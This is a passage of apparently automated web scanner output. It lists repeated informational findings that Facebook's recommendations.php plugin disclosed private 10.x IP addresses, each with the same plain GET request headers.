Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.954. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.139.49

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.955. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.145.32

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.956. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.7.59

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.957. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.4.36

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.958. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.138.53

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.959. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.102.55

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.960. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.16.123

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.961. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.161.112

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.962. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.103.43

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.963. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.20.117

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.964. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.118.55

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.965. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.19.28

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.966. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.114.107

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.967. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.174.64

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.968. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.228.60

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.969. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.135.41

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.970. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.161.63

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.971. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.36.57

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.972. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.229.55

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.973. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.178.30

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.974. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.78.37

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.975. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.163.64

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.976. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.167.45

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.977. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.222.30

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.978. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.77.46

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.979. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.192.43

Request

Response

19.980. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.25.27

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
